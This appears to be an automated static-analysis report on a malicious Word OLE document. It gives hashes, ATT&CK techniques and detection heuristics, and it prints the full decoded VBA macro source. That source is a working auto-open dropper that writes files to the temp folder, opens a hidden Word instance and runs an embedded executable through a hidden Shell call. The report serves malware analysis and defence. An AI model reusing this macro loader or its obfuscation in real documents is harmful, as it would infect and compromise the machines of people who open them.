Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 55d440408af16e0d…

MALICIOUS

Office (OLE)

191.5 KB Created: 2016-03-31 11:24:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: b284897f26aac5b54da477a860d464ff SHA-1: 1cdbf0e4bf15c733a35c8eb02ac65070699efd05 SHA-256: 55d440408af16e0daf2b2700664b72a4f98582669d2eb7ea9337f82cbbb39677
674 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. These macros are designed to execute an embedded PE executable (embedded_office_0000624e.exe) using CreateObject and Shell calls. The presence of LoadLibrary and GetProcAddress API calls further suggests dynamic loading of malicious code. The ClamAV detection of 'BC.Win.Packer.Troll-14' on both the main file and the extracted executable reinforces its malicious nature.

Heuristics 18

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: BC.Win.Packer.Troll-14 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: BC.Win.Packer.Troll-14
  • XOR-encoded strings (key 0xCF) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0xCF: 'kernel32.dll', 'kernel32.dll', 'kernel32.dll', 'advapi32.dll', 'advapi32.dll', 'shell32.dll', 'shell32.dll', 'shell32.dll'
    Disassembly
    Attempted x86 opcode disassembly
    000108BC  a4                movsb byte ptr es:[edi], byte ptr [esi]
000108BD  aa                stosb byte ptr es:[edi], al
000108BE  bda1aaa3fc        mov ebp, 0xfca3aaa1
000108C3  fd                std
000108C4  e1ab              loope 0x10871
000108C6  a3a3cfcfe2        mov dword ptr [0xe2cfcfa3], eax
000108CB  cf                iretd
000108CC  80adbbaea6a19a    sub byte ptr [ebp - 0x5e595145], 0x9a
000108D3  bcaabd8ea8        mov esp, 0xa88ebdaa
000108D8  aa                stosb byte ptr es:[edi], al
000108D9  a1bb9cbbbd        mov eax, dword ptr [0xbdbb9cbb]
000108DE  a6                cmpsb byte ptr [esi], byte ptr es:[edi]
000108DF  a1a8cfbabd        mov eax, dword ptr [0xbdbacfa8]
000108E4  a3a2a0a1e1        mov dword ptr [0xe1a1a0a2], eax
000108E9  ab                stosd dword ptr es:[edi], eax
000108EA  a3a3cfcf82        mov dword ptr [0x82cfcfa3], eax
000108EF  cf                iretd
000108F0  83a0aeab9abcaa    and dword ptr [eax - 0x43655452], 0xffffffaa
000108F7  bd9fbda0a9        mov ebp, 0xa9a0bd9f
000108FC  a6                cmpsb byte ptr [esi], byte ptr es:[edi]
000108FD  a3aa8ecfcf        mov dword ptr [0xcfcf8eaa], eax
00010902  ae                scasb al, byte ptr es:[edi]
00010903  cf                iretd
00010904  9aa1a3a0aeab9a    lcall 0x9aab, 0xaea0a3a1
0001090B  bcaabd9fbd        mov esp, 0xbd9fbdaa
00010910  a0a9a6a3aa        mov al, byte ptr [0xaaa3a6a9]
00010915  cf                iretd
00010916  babcaabdaa        mov edx, 0xaabdaabc
0001091B  a1                .byte 0xa1
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim fje As Variant
fje = Shell(efw, 0)
End Function
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    NCJASD = ";aksd ljask"
Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n")
bhGdggwSw.Visible = nnff
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    NCJASD = ";aksd ljask"
Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n")
bhGdggwSw.Visible = nnff
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
Sub AutoOpen()
    UHQKDW = "12';l e;12lkkj12l"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Function
Sub Workbook_Open()
    Cssw
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    KKLOR = YhhrJne(3 + 90 + wpp)
NNJDJ = Environ$(VVCBD) + KKLOR
DDVD = "" & "." & ""
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1984 bytes
SHA-256: cecd6af937a42a6a185324b4e82b0cf375709f628a4e4421a965da50461bbe09
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Wpdw()
    Cssw
End Sub
Sub Cssw()

Dim nnff As Boolean, VNDW As String, wpp As Integer, EDWD As String


wpp = -5 + 4
VVCBD = UHbdd()
VVCBD = VVCBD & "P"
nnff = False
On Error Resume Next
Dim WOIEW As String
KKLOR = YhhrJne(3 + 90 + wpp)
NNJDJ = Environ$(VVCBD) + KKLOR
DDVD = "" & "." & ""
FEPWW = DDVD + "g"
FEPWW = FEPWW & "i" & "f"
DEIBE = DDVD & "rt" & YhhrJne(99 + 3)

FFFNNNF = NNJDJ + "jfje" + DEIBE
SSHHDD = NNJDJ & "feww" + DEIBE
WOIEW = NNJDJ & "mt1" & FEPWW

Module1.HNbfw (FFFNNNF)
Module1.HNbfw (SSHHDD)

Module1.Nnfhhe
RLKDWD = Environ$(VVCBD) & "\jfje" & ".rt" & "f"
NCJASD = ";aksd ljask"
Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n")
bhGdggwSw.Visible = nnff
 bhGdggwSw.Documents.Open (RLKDWD)
Module1.Polkd (2)
HYUASGD = Module1.Pjndw(WOIEW)
Module1.Polkd (3)
bhGdggwSw.Quit
Set bhGdggwSw = Nothing
End Sub
Public Function YhhrJne(wbrw As Integer)
    YhhrJne = Chr(wbrw)
End Function
Public Function UHbdd()
    UHbdd = "T" & "EM"
End Function
Sub Workbook_Open()
    Cssw
End Sub
Sub AutoOpen()
    UHQKDW = "12';l e;12lkkj12l"
    Wpdw
End Sub

Sub Auto_Open()

    Cssw
End Sub































Attribute VB_Name = "Module1"
Sub Polkd(Lkke As Long)
poew = 24
Dim Mndw As Long

Dim Tgve As Long
Tgve = Lkke + Timer
Mndw = Tgve
Do While Timer < Mndw
DoEvents
Loop
End Sub
Public Function Pjndw(efw As String)
Dim fje As Variant
fje = Shell(efw, 0)
End Function
Sub Nnfhhe()
Polkd (2)
End Sub
Public Function HNbfw(faw As String)
ActiveDocument.SaveAs FileName:=faw, FileFormat:=wdFormatRTF
End Function
embedded_office_0000624e.exe embedded-pe Office MZ+PE at offset 0x624E 170932 bytes
SHA-256: 791e712e4692311a7bdf03f0370eca968ad4c83469bad469385ba7d27c47b743
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1520952082/Ole10Native 147660 bytes
SHA-256: ca2ad01801ac75299e7d11a95f41c8dc63bf1f8fdcc8881a4bdd332a9e070af5
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.